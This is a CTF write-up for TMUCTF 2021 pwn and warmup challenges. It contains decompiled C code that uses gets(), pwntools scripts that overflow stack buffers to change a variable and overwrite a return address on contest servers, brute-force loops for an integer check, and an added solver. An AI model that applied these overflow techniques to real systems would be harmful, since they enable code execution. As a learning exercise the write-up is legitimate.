    int main() {
        char local_58 [76];
        int local_c;

        setbuf(stdout,(char*)0x0);
        setbuf(stdin,(char*)0x0);
        setbuf(stderr,(char*)0x0);
        tmulogo();
        puts("Welcome to TMUCTF 2021! Let us know your name: ");
        local_c = 0;
        gets(local_58);
        puts("Thanks!\n");
        if (local_c != 0) {
            system("cat flag.txt");
        }
        return 0;
    }
Solution
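This is the first thing you learn when opening a book on reverse engineering/pwn: a buffer overflow to access the flag. gets() does no bounds checking, so any input longer than the 76-byte local_58 buffer spills into local_c, and a non-zero local_c is all the program checks before printing the flag.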
    from pwn import *

    # 76 bytes fill local_58; the 2 extra bytes land in local_c and make it non-zero
    payload = b"A" * 78

    #binary = process("./warmup")
    binary = remote("194.5.207.56", 7000)
    print(binary.recvuntil(bytes("name:", "utf-8")))
    binary.sendline(payload)
    binary.interactive()
Flag: TMUCTF{??????}
Baby Pwn [50 pts]
Description
Can you get the flag?
nc 194.5.207.56 7010, nc 185.239.107.54 7010
Decompiled Code
    int main(void) {
        char name [28];
        int local_c;

        setbuf(stdout,(char*)0x0);
        setbuf(stderr,(char*)0x0);
        setbuf(stdin,(char*)0x0);
        tmulogo();
        local_c = 0;
        puts("Hi, Please enter your name: ");
        gets(name);
        if (local_c == 0xcafe) {
            helloUser(name);
        }
        return 0;
    }

    void helloUser(undefined8 param_1) {
        char local_88 [128];

        printf("Nice to meet you %s!\n",param_1);
        puts("Tell me about yourself ;;)");
        gets(local_88);
        puts("It was a pleasure meeting you.");
        return;
    }
Solution
This is a common warmup problem that appears in CTFs, so I went through it easily. Well, sort of. I grabbed some past code and found in the source what I am doing. I did everything right except it wasn't printing out the flag. Later on, another member looked over it and found that my address was completely wrong, and a simple fix was all it took. The code is below.
    from pwn import *
    import time

    addr1 = 0xcafe          # value main() compares local_c against
    flag_os = 0x4012f0
    payload = b"A" * 28     # fills name[28] in main()
    payload2 = b"A" * 128   # fills local_88[128] in helloUser()
    newline = bytes('\n', 'utf-8')

    #binary = process("./babypwn")
    binary = remote('194.5.207.56', 7010)
    print(binary.recvuntil(bytes("name:", "utf-8")))
    binary.sendline(payload + p64(addr1))  # Makes it to Hello User
    print(binary.recvuntil(bytes(")", "utf-8")))  # Get to here
    binary.sendline(payload2 + p64(flag_os) + p64(flag_os))
    binary.interactive()
Flag: TMUCTF{??????}
Are you admin [198 pts] [Not Solved]
Description
Just admin can get the flag! Note that the admin likes integers!
    from pwn import *

    user = bytes("AlexTheUser", "utf-8")
    password = bytes("4l3x7h3p455w0rd", "utf-8")
    #print(len(p64(flag_address)))
    #binary = process("./areyouadmin")
    #binary.close()
    binary = remote("194.5.207.113", 7020)
    print(binary.recvuntil(bytes("username:", "utf-8")))
    binary.sendline(user)
    print(binary.recvuntil(bytes("password:", "utf-8")))
    binary.sendline(password)
    #binary.sendline(payload + p64(flag_address))
    #binary.interactive()
    binary.close()
    print("made it to the numbers")
    """
    top = 233
    found = False
    i1 = 0
    i4 = 0
    i5 = 0
    while not found:
        for i2 in range(100, top):
            for i3 in range(100, top):
                i1 = (-1 * i3 * i2) + 0x16d3
                i4 = (0x37a2 - i2) / i3
                # Using New Known
                i5 = (0x253f - i3) / i4
                if (i5 + i2 * i1) == 0x1bc9:
                    print(i1, i2, i3, i4, i5)
                if (i4 + i1 * i5) == 0x703f:
                    print(i1, i2, i3, i4, i5)
    """
    # 233 30 187 76 123
    """
    if (((num3 + num5 * num4 == 0x253f)) && (((num2 + num4 * num3 == 0x37a2 && (num1 + num3 * num2 == 0x16d3)) && ((num5 + num2 * num1 == 0x1bc9 && (num4 + num1 * num5 == 0x703f)))))) {
    """
    """
    top = 100
    for i1 in range(0 , 100):
        print(i1)
        for i2 in range(0 , 10000):
            for i3 in range(28, 32):
                for i4 in range(90, 100):
                    for i5 in range(90, 100):
                        if (i3 + i5 * i4 == 9535):
                            if(i2 + i4 * i3 == 14242):
                                print(i2, i3, i4)
                                if(i1 + i3 * i2 == 5843):
                                    if (i5 + i2 * i1 == 7113):
                                        if (i4 + i1 * i5 == 28735):
                                            print(i1, i2, i3, i4, i5)
    """
    # Original Guess = 9535 14242 5843 7113 28735
    #num1 + num3 * num2 == 0x16d3
    #num3 + num5 * num4 == 0x253f
    #num2 + num4 * num3 == 0x37a2
    #num5 + num2 * num1 == 0x1bc9
    #num4 + num1 * num5 == 0x703f
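The five equalities listed in the script's comments can be solved by substitution rather than by nested loops over all five values. The following is an added example, not the author's code: it enumerates only num2 and num3, derives the other three with exact integer division (rejecting any remainder), and assumes that every value is a positive integer below 256, which the page does not state.

```python
"""Added example: solve the five-integer check by substitution."""


def check(n1, n2, n3, n4, n5):
    """The five equalities from the decompiled condition quoted on the page."""
    return (
        n3 + n5 * n4 == 0x253f
        and n2 + n4 * n3 == 0x37a2
        and n1 + n3 * n2 == 0x16d3
        and n5 + n2 * n1 == 0x1bc9
        and n4 + n1 * n5 == 0x703f
    )


def solve(limit=256):
    """Return every (num1..num5) tuple with all values in [1, limit).

    Assumption (not from the page): each number is a positive integer
    below `limit`. Only num2 and num3 are enumerated; the other three
    follow from the equations, so the search is limit**2, not limit**5.
    """
    solutions = []
    for n2 in range(1, limit):
        for n3 in range(1, limit):
            n1 = 0x16d3 - n3 * n2                # from num1 + num3*num2
            if not 0 < n1 < limit:
                continue
            n4, rem = divmod(0x37a2 - n2, n3)    # from num2 + num4*num3
            if rem or not 0 < n4 < limit:
                continue                         # non-integer or out of range
            n5, rem = divmod(0x253f - n3, n4)    # from num3 + num5*num4
            if rem or not 0 < n5 < limit:
                continue
            # The two equations not used for derivation act as the
            # independent verification step inside check().
            if check(n1, n2, n3, n4, n5):
                solutions.append((n1, n2, n3, n4, n5))
    return solutions


if __name__ == "__main__":
    for s in solve():
        print("num1..num5 =", s)
```

The result includes the tuple recorded in the script's `# 233 30 187 76 123` comment.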
Welcome
Warmup [50 pts]
Description
A fun visual cryptography tool will amaze your kids!
Note: Remember the flag format is TMUCTF{...}.
Solution
Notice a small difference in the two file sizes. I was like, hmmm, let me see what would happen if I combine the images. I overlaid one on top of the other one and got the final image of the flag.